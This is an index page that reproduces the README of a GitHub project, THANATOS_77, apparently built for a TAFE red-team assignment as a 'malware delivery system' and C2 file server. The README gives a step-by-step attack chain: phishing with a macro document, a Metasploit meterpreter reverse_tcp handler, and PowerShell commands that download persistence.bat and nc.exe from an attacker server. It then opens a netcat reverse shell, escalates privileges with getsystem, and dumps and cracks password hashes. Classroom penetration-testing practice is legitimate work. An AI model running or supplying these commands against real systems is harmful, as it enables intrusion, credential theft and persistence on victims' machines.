Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/satunix/thanatos_77
HTTP Web Server for Penetration Testing Exercise for TAFE. Can be adapted into any file serving capabilities through a browser.
https://github.com/satunix/thanatos_77
cybersecurity flask-application malware-research powershell python3 webapp
Last synced: 9 days ago
JSON representation
HTTP Web Server for Penetration Testing Exercise for TAFE. Can be adapted into any file serving capabilities through a browser.
- Host: GitHub
- URL: https://github.com/satunix/thanatos_77
- Owner: SATUNIX
- Created: 2023-04-26T09:48:11.000Z (almost 2 years ago)
- Default Branch: main
- Last Pushed: 2023-05-19T08:16:59.000Z (over 1 year ago)
- Last Synced: 2024-12-07T19:43:17.546Z (2 months ago)
- Topics: cybersecurity, flask-application, malware-research, powershell, python3, webapp
- Language: CSS
- Homepage: https://ud.me/tritiumcyber.blockchain
- Size: 127 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# THANATOS_77
![DALL·E 2023-05-08 18 37 02 - A glitch art knife ](https://user-images.githubusercontent.com/111553838/236778209-067c7d06-df52-4e1e-8683-e4ab827cc76b.png)TRITIUM CYBER DEFENCE © All Rights Reserved 2023
HTTP and malware delivery system for tafe assignment
# PURPOSE
Provide a way for our team to serve files, extract data, and export data
to create reports for our final assesment on a red team engagemnt.# SIMPLI X KILL CHAIN
1. Recon and sniffing
2. Configuring payloads
3. get credentials from phishing a confidential document (enter password to open)
4. use credentials to download and launch a netcat listener
5. open a reverse shell and use the scp protocol to exfiltrate data
6. Launch a cleaner program, DOS test
7. Reboot to clear RAM
All steps are sub 15 minutes total.# INSTALL
## Clone the repo, allow config yada yada# CONFIG
config here: should be handled by scripts# MANIFEST FOR TAFE ASSIGNMENT
Below is the specific steps for; dependencies, requirements, and commands for the IRTx scenario.
Utilising the aformentioned tools and tools within this git hub repository.## Beware:
Networking variables and http / folder locations in following programs are set to defaults and may need configurations pertaining to your current attack.
1. FLASK_25.py
2. msfstarted.py
3. generate_macro_doc.sh
4. Programs within /uploads
5. Powershell scripts /\-Clone repo
```
git clone https://github/SATUNIX/THANATOS_77
```
-Change permissions
```
sudo chmod +x *
```
-Run msfstarter.py as sudo
```
sudo python3 msfstarter.py
```
This will start a metasploit console listner in your current terminal.
![image](https://github.com/SATUNIX/THANATOS_77/assets/111553838/31a52ab2-4be3-4b30-85c4-1a3b4fbfaaf0)You may recieve the following errors:
![image](https://github.com/SATUNIX/THANATOS_77/assets/111553838/c576a96d-8b98-4135-b144-12c37a9b9cf7)
If so: Please run the commands manually, your payload file should be created at this stage.
Replace variables with your respective configurations.
```
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST {my_ip}
set LPORT {my_port}
exploit -j -z
```-Run an appropriate flask program (Suggested is FLASK_25.py with variables adjusted to your configuration)
![image](https://github.com/SATUNIX/THANATOS_77/assets/111553838/110a919c-3fd7-4df3-bd06-a61c2c05ff12)-Below is the web page for your C2 (Command and control server)
-Here you are able to manually download and upload files to your kali / attacking machine. If the pfsense router is setup correctly, you should be able to recieve traffic.
![image](https://github.com/SATUNIX/THANATOS_77/assets/111553838/172562ea-a163-49de-8f16-76415200846f)-Target downloads document from generator from phishing
-All of the scripts require your own testing and configuration to verify the flask structure for get requests, netcat listeners, etc
-Verify command as you are requesting powershell scripts within
-In msf console command:
```
powershell -c "Invoke-WebRequest -Uri 'http://10.1.1.1:8080/persistence.bat' -OutFile 'persistence.bat'"
powershell -c "Invoke-WebRequest -Uri 'http://10.1.1.1:8080/nc.bin' -OutFile 'nc.exe'"
```-Start netcat listner in kali
```
nc -lvp 8339
```-Go back to msf console and run following to start netcat shells and persistance
```
nc.exe 10.1.1.1 8339 -e
```-Metasploit privalage escalation V1:
In msf console try:
```
meterpreter > getsystem
```If successful you will have system access, if not:
Simultaneously perform the following and the manual steps below:```
meterpreter > hashdump
meterpreter > hashdump > hashes.txt
john --format=NT hashes.txt
```
In another shell run to crack with wordlist:```
john --format=NT --wordlist= PATH TO WORDLIST HERE/.txt hashes.txt
```
A default wordlist for the tafe assignment is provided in the uploads directory.MANUALLY PERFORMING TASKS INCASE OF PYTHON AUTOMATION FALIURE.
*****Replace with the ID of your Meterpreter session.***```
meterpreter > sysinfo
meterpreter > background
msf > use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > set SESSION
msf post(local_exploit_suggester) > set SHOWDESCRIPTION true
msf post(local_exploit_suggester) > run
```From the list of suggested exploits, choose an appropriate one based on the target system's architecture and vulnerability.
Set up and run the chosen exploit:
bash:
```
msf > use
msf exploit() > set SESSION
msf exploit() > set payload windows/meterpreter/reverse_tcp
msf exploit() > set LHOST
msf exploit() > set LPORT
msf exploit() > exploit
```
If the exploit is successful, you should have a new Meterpreter session with administrator privileges. Use the hashdump command to dump the password hashes from the system:## No warranty:
Specific networked infrastructure for automating an attack.
Copyright (C) <2023>This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.You should have received a copy of the GNU General Public License
along with this program. If not, see .